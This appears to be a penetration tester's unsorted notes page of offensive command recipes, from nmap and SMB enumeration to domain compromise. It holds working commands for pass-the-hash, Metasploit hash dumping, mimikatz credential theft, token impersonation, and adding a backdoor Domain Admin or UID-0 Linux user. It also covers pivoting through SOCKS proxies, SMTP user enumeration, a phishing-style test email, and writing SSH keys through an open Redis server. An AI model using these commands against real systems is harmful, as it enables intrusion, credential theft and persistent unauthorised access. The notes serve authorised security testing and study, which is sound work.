Misc notes that still need to be sorted through and sent to their proper homes.
Hack Responsibly.
Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Markdown
{% hint style="warning" %} Text between these will show up in a Warning box. Looks nice! {% endhint %}
Text between these will show up in a Warning box. Looks nice! (Gitbook only!)
ls /usr/share/nmap/scripts/ |grep smb - find nmap scripts related to smb, search this folder for any scripts for a service you want to enumerate
-----
Cisco Smart Install Client Service Available -Then, we can pull the configs with SIET: siet.py -i 10.10.10.10 -g SIET: https://github.com/Sab0tag3d/SIET/
pass the hash
responder.py - or - write .lnk files to writeable shares that point back to attacker - capture hashes and relay attacks enable smb signing and limit llmnr (group policy) respounder - detect responder - responder guard
crackmapexec smb ip -u <name> -H <hash> --lsa - pass the hash; drsuapi - search in wireshark to detect - win long id 4624 user_reported_sid: S-1-0-0 logon_process_name:ntlmssp
Some programs have issues with rockyou.txt because the file is in the wrong encoding by default. USe the above to convert it to utf8 so it works with these programs.
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.
[+] Word Count
wc -l tmp2 Count the number of lines in a file
[+] sort
sort -u file Sort by unique
sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n Sort IP addresses correctly
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address
[+] awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
[+] colors
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan
echo -e "\e[1;34mThis is a blue text.\e[0m"
[+] Make a file executable.
chmod +x file
chmod 755 file
[+] Reminders
LOG EVERYTHING!
Metasploit - spool /home/<username>/console.log
Linux Terminal - script /home/<username>/Engagements/TestOutput.txt #Type exit to stop
Set IP address
ifconfig eth0 192.168.50.12/24
Set default gateway
route add default gw 192.168.50.9
Set DNS servers
echo "nameserver 192.168.100.2" >> /etc/resolv.conf
Show routing table
Windows - route print
Linux - route -n
Add static route
Linux - route add -net 192.168.100.0/24 gw 192.16.50.9
Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9
Subnetting easy mode
ipcalc 192.168.0.1 255.255.255.0
[+] External Infrastructure Testing - Information Gathering
WHOIS Querying
whois www.domain.com
Resolve an IP using DIG
host www.google.com 8.8.8.8
Find Mail servers for a domain
host -t mx www.gmail.com 8.8.8.8
Find any DNS records for a domain
host -t any www.google.com 8.8.8.8
Zone Transfer
host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliarys
auxiliary/gather/enum_dns
Fierce
fierce -dns <domain> -wordlist <wordlist>
[+] External Infrastructure Testing - VPN Testing
ike-scan
ike-scan 192.168.207.134
sudo ike-scan -A 192.168.207.134
sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key
pskcrack
psk-crack -b 5 192-168-207-134key
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary 192-168-207-134key
[+] Internal Infrastructure Testing - Network Enumeration
DHCP Information - Use ipconfig /all to obtain useful information.
Network Sniffing (Wireshark, tshark, tcpdump)
Sniffing is a great passive method for mapping networks and systems. Typically, you’ll see a lot of broadcast traffic such as DNS, NBNS, BROWSER, and Cisco protocols that reveal hostnames, active subnets, VLANS, and domain names.
Net view
net view /ALL /Domain:clientdomain.com
ARP Scan
arp-scan 192.168.50.8/28 -I eth0
Nmap ping scan
sudo nmap –sn -oA nmap_pingscan 192.168.100.0/24
Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24
Nmap all port version scan
sudo nmap -sTV -p0- -A --stats-every 10s --reason --min-rate 1000 -oA nmap_scan 192.168.0.1/24
Nmap UDP all port scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24
Nmap source port scanning
nmap -g <port> (88 (Kerberos) port 53 (DNS) or 67 (DHCP))
Hping3 scanning
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response
[+] Internal Infrastructure Testing - Windows Domain Enumeration
Obtain domain information using windows
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName
DNS Lookup
nslookup -type=SRV _ldap._tcp.
User/Domain enumeration using RDP
rdesktop 172.16.100.141 -u ""
Net Group Command
net group "Domain Controllers" /domain
Netbios enumeration
nbtscan -r 192.168.0.1-100
nbtscan -f hostfiles.txt
enum4linux
RID cycling
use auxiliary/scanner/smb/smb_lookupsid
ridenum
Net Users
net users /domain
Null session in windows
net use \\192.168.0.1\IPC$ "" /u:""
Null session in linux
smbclient -L //192.168.99.131
nbtscan
nbtscan -r 10.0.2.0/24
Sharepoint User Profile Page
Find SharePoint servers with nmap, Nessus etc.
Net Accounts - Obtain Password Policy
net accounts
[+] Internal Infrastructure Testing - Quick Domain Administrator Compromise
Compromise machine via missing Microsoft patch, weak credentials or credentials found via Responder.
From Shell - net group "Domain Admins" /domain
Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run
msf> spool off
Compromise the administrator's machine
meterpreter > load mimikatz
meterpreter > wdigest
or
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
[+] Internal Infrastructure Testing - Post Exploitation
Meterpreter
meterpreter> sysinfo
meterpreter> getuid
meterpreter> ipconfig
meterpreter> run post/windows/gather/checkvm
meterpreter> run get_local_subnets
Privilege Escalation (If Required)
run post/windows/escalate/getsystem
use post/windows/escalate/droplnk
use exploit/windows/local/bypassuac
use exploit/windows/local/service_permissions
use exploit/windows/local/trusted_service_path
use exploit/windows/local/ppr_flatten_rec
use exploit/windows/local/ms_ndproxy
use exploit/windows/local/ask
meterpreter> run getcountermeasure
meterpreter> run winenum
meterpreter> run post/windows/gather/smart_hashdump
meterpreter> run post/windows/gather/credentials/sso
meterpreter> run post/windows/gather/cachedump
meterpreter> run post/windows/gather/lsa_secrets
meterpreter> run post/windows/gather/smart_hashdump
meterpreter> run post/windows/gather/enum_ad_computers
meterpreter> run post/windows/gather/win_privs
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/enum_snmp
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token TVM\domainadmin
meterpreter > add_user hacker password1 -h 192.168.0.10
meterpreter > add_group_user "Domain Admins" hacker -h 192.168.0.10
meterpreter > load mimikatz
meterpreter > wdigest
Dump remote SAM:
meterpreter> run post/windows/gather/smart_hashdump
python-impact
psexec.py
secretsdump.py
Kitrap0d
Download vdmallowed.exe and vdmexploit.dll to victim
Run vdmallowed.exe to execute system shell
Add Linux User
/usr/sbin/useradd –g 0 –u 0 –o user
echo user:password | /usr/sbin/chpasswd
Solaris Commands
useradd -o user
passwd user
usermod -R root user
RSERVICES
---------
rwho 192.168.0.1
rlogin -l root 192.168.0.17
RPC Services
------------
rpcinfo -p
Endpoint_mapper metasploit
Windows Enumeration
Find Group Policy Preference XML files:
C:>findstr /S cpassword %logonserver%\sysvol\*.xml
meterpreter > post/windows/gather/credentials/gpp
[+] Pivoting - Lateral Movement
SSH Tunneling:
Remote forward port 222
ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118
meterpreter> run arp_scanner -r 10.10.10.0/24
route add 10.10.10.10 255.255.255.248 <session>
use auxiliary/scanner/portscan/tcp
autoroute:
meterpreter > ipconfig
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > getsystem
meterpreter > run hashdump
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > use exploit/windows/smb/psexec
port forwarding:
meterpreter > run autoroute -s 10.1.13.0/24
use auxiliary/scanner/portscan/tcp
meterpreter > portfwd add -l <listening port> -p <remote port> -r <remote/internal host>
socks proxy:
route add 10.10.10.10 255.255.255.248 <session>
use auxiliary/server/socks4a
Add proxy to /etc/proxychains.conf
proxychains nmap -sT -T4 -Pn 10.10.10.50
setg socks4:127.0.0.1:1080
ncat -C mail.host.com 25
EHLO hostname
MAIL FROM: test@host.com
RCPT TO: www@host.com
DATA
From: A tester <test@host.com>
To: <www@host.com>
Date: date
Subject: A test message from hostname
Click me, please http://10.10.10.10/
.
QUIT
Useful Commands
[+] Remove text using sed
cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g'
[+] Port forwarding using NCAT
ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443"
[+] Windows 7 or later, build port relay
C:\> netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>
[+] Grab HTTP Headers
curl -LIN <host>
[+] Quickly generate an MD5 hash for a text string using OpenSSL
echo -n 'text to be encrypted' | openssl md5
[+] Shutdown a Windows machine from Linux
net rpc shutdown -I ipAddressOfWindowsPC -U username%password
[+] Conficker Detection with NMAP
nmap -PN -d -p445 --script=smb-check-vulns --script-args=safe=1 IP-RANGES
[+] Determine if a port is open with bash
(: </dev/tcp/127.0.0.1/80) &>/dev/null && echo "OPEN" || echo "CLOSED"
Port Scanning
Connect Scanning
The simplest TCP port scanning technique, usually called CONNECT scanning, relies on the three-way TCP handshake mechanism.
Connect port scanning involves attempting to complete a three-way handshake with the target host on the specified port(s).
If the handshake is completed, this indicates that the port is open.
# TCP Netcat port scan on ports 3388-3390
> nc -nvv -w 1 -z 10.0.0.19 3388-3390
# -n :: numeric only ip adressess no DNS
# -v :: verboose use twice to be more verboose
# -w :: (secs) timeout for connects and final net reads
# -z :: zero I/O mode (used for scanning)
Stealth / SYN Scanning
SYN scanning, or stealth scanning, is a TCP port scanning method that involves sending SYN packets to various ports on a target machine without completing a TCP handshake.
If a TCP port is open, a SYN-ACK should be sent back from the target machine, informing us that the port is open, without the need to send a final ACK back to the target machine.
With early and primitive firewalls, this method would often bypass firewall logging, as this logging was limited to completed TCP sessions.
This is no longer true with modern firewalls, and the term stealth is misleading. Users might believe their scans will somehow not be detected, when in fact, they will be.
UDP port scanning is often unreliable, as firewalls and routers may drop ICMP packets. This can lead to false positives in your scan, and you will regularly see UDP port scans showing all UDP ports open on a scanned machine.
Most port scanners do not scan all available ports, and usually have a preset list of “interesting ports” that are scanned.
People often forget to scan for UDP services, and stick only to TCP scanning, thereby seeing only half of the equation.
Port Scanning with Nmap
A default nmap TCP scan will scan the 1000 most popular ports on a given machine.
# We’ll scan one of my local machines while monitoring the amount
# of traffic sent to the specific host using iptables.
> iptables -I INPUT 1 -s 10.0.0.19 -j ACCEPT
> iptables -I OUTPUT 1 -d 10.0.0.19 -j ACCEPT
> iptables -Z
# -I :: insert in chain as rulenum ( default 1=first)
# -s :: source (address)
# -j :: jump target for the rulw
# -Z :: ??
> nmpap -sT 10.0.0.9
> iptables -vn -L
> iptables -Z
# -sT :: TCP Connect Scan
# -v :: Display more information in the output
# -L :: List the current filter rules.
> nmap -sT -p 1-65635 10.0.0.19
> iptables -vn -L
# -p :: port range
This default 1000 port scan has generated around 72KB of traffic.
A similar local port scan explicitly probing all 65535 ports would generate about 4.5 MB of traffic, a significantly higher amount.
However, this full port scan has discovered two new ports that were not found by the default TCP scan: ports 180 and 25017.
--Full nmap scan of a class C network (254 hosts) would result in sending over 1000 MB of traffic to the network.--
So, if we are in a position where we can’t run a full port scan on the network, what can we do?
Network Sweeping
To deal with large volumes of hosts, or to otherwise try to conserve network traffic, we can attempt to probe these machines using Network Sweeping techniques.
Machines that filter or block ICMP requests may seem down to a ping sweep, so it is not a definitive way to identify which machines are really up or down.
> nmap -sP 192.168.1.0/24 ## Deprecated in modern versions Use -sn instead
Show ips of connected devices
> nmap -sn 192.168.11.200-250
# -sn :: ping scan
# using the grep command can give you output that’s difficult to manage.
# let’s use Nmap’s “greppable” output parameter (-oG)
> nmap -v -sn 192.168.11.200-250 -oG ping-sweep.txt
> grep Up ping-sweep.txt | cut -d " " -f 2
# we can sweep for specific TCP or UDP ports (-p) across the network
> nmap -p 80 192.168.11.200-250 -oG web-sweep.txt
> grep open web-sweep.txt |cut -d " " -f 2
# we are conducting a scan for the top 20 TCP ports.
> nmap –sT –A --top-ports=20 192.168.11.200-250 –oG top-port-sweep.txt
Machines that prove to be rich in services, or otherwise interesting, would then be individually port scanned, using a more exhaustive port list.
OS Fingerprinting
# OS fingerprinting (-O parameter).
> nmap -O 10.0.0.19
Banner Grabbing/Service Enumeration
Nmap can also help identify services on specific ports, by banner grabbing, and running several enumeration scripts (-sV and -A parameters).
> nmap -sV -sT 10.0.0.19
# -sV :: probe open ports to determine service / version info
Nmap Scripting Engine (NSE)
The scripts include a broad range of utilities, from DNS enumeration scripts, brute force attack scripts, and even vulnerability identification scripts.
All NSE scripts can be found in the /usr/share/nmap/scripts directory
> nmap 10.0.0.19 --script smb-os-discovery.nse
# Another useful script is the DNS zone transfer NSE script
> nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com
SMB Enumeration
SMB1 – Windows 2000, XP and Windows 2003.
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.
Scanning for the NetBIOS Service
The SMB NetBIOS32 service listens on TCP ports 139 and 445, as well as several UDP ports.
There are other, more specialized, tools for specifically identifying NetBIOS information
> nbtscan -r 192.168.11.0/24
Null Session Enumeration
A null session refers to an unauthenticated NetBIOS session between two computers. This feature exists to allow unauthenticated machines to obtain browse lists from other Microsoft servers.
A null session also allows unauthenticated hackers to obtain large amounts of information about the machine, such as password policies, usernames, group names, machine names, user and host SIDs.
This Microsoft feature existed in SMB1 by default and was later restricted in subsequent versions of SMB.
> enum4linux -a 192.168.11.227
Nmap SMB NSE Scripts
# These scripts can be found in the /usr/share/nmap/scripts directory
> ls -l /usr/share/nmap/scripts/smb-
# We can see that several interesting Nmap SMB NSE scripts exist,, such as OS discovery
# and enumeration of various pieces of information from the protocol
> nmap -v -p 139, 445 --script=smb-os-discovery 192.168.11.227
# To check for known SMB protocol vulnerabilities,
# you can invoke the nmap smb-check-vulns script
> nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 192.168.11.201
SMTP Enumeration
mail servers can also be used to gather information about a host or network.
SMTP supports several important commands, such as VRFY and EXPN.
A VRFY request asks the server to verify an email address
while EXPN asks the server for the membership of a mailing list.
These can often be abused to verify existing users on a mail server, which can later aid the attacker.
# This procedure can be used to help guess valid usernames.
> nc -nv 192.168.11.215 25
Examine the following simple Python script that opens a TCP socket, connects to the SMTP server, and issues a VRFY command for a given username.
# !/usr/bin/python
import socket
import sys
if len(sys.argv) != 2:
print "Usage: vrfy.py <username>"
sys.exit(0)
# Create a Socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the Server
connect=s.connect(('192.168.11.215',25))
# Receive the banner
banner=s.recv(1024)
print banner
# VRFY a user
s.send('VRFY' - sys.argv[1] - '\r\n')
result=s.recv(1024)
print result
# Close the socket
s.close()
-----
Port Scanning :
nmap -sC -sV -o nmap -A -T5 10.10.10.x
Host Discovery
• nmap -sn 10.10.1.1-254 -vv -oA hosts
• netdiscover -r 10.10.10.0/24
DNS server discovery
• nmap -p 53 10.10.10.1-254 -vv -oA dcs
NSE Scripts Scan
* nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan)
Port specific NSE script list :
ls /usr/share/nmap/scripts/ssh*
ls /usr/share/nmap/scripts/smb*
SMB v1 in Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016
In the output of config get * you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users file to access via ssh with the user redis. If you know the home of other valid user where you have writable permissions you can also abuse it:
Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa
Write the public key to a file : (echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
Import the file into redis : cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit
Save the public key to the authorized_keys file on redis server:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /home/test/.ssh/
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK